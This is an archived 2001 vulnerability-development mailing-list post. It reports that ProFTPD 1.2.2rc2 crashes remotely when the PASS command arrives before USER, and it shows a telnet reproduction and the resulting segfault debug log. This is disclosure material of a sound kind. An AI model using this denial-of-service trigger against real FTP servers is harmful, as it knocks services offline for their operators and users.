Nmap stealth port scanner
*Intro
*Docs
*Download
Security Tools
Good Reading
Security Lists
*Nmap-hackers
*Nmap-dev
*Bugtraq
*Vuln-dev
*Sec. News
*More
News
Links
Exploit World
Advertising
About/Contact
Credits
Vulnerability Development: ProFTPD 1.2.2rc2 DoS

From: Daniel (daniel_at_sdf.lonestar.org)
Date: Jun 03 2001


I've discovered that ProFTPD 1.2.2rc2 has a bug - each instance of the
daemon can be crashed remotely:
This happens when the PASS command is received before the USER command:
box:~# telnet 127.0.0.1 21
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
220 ProFTPD 1.2.2rc2 Server (ProFTPD Default Installation) [box.xxx.com]
pass
Connection closed by foreign host.
box:~#
If you run proftpd -d 5, (debug mode, level 5) in the logs you see:
box.xxx.com (localhost[127.0.0.1]) - FTP session opened.
box.xxx.com (localhost[127.0.0.1]) - received: PASS (hidden)
box.xxx.com (localhost[127.0.0.1]) - ProFTPD terminating (signal 11)

 - Daniel Volozov


[ Nmap | Tools | Lists | Reading | News | About/Contact | Advertising | Privacy Policy ]
[ Web Archive generated using Hypermail]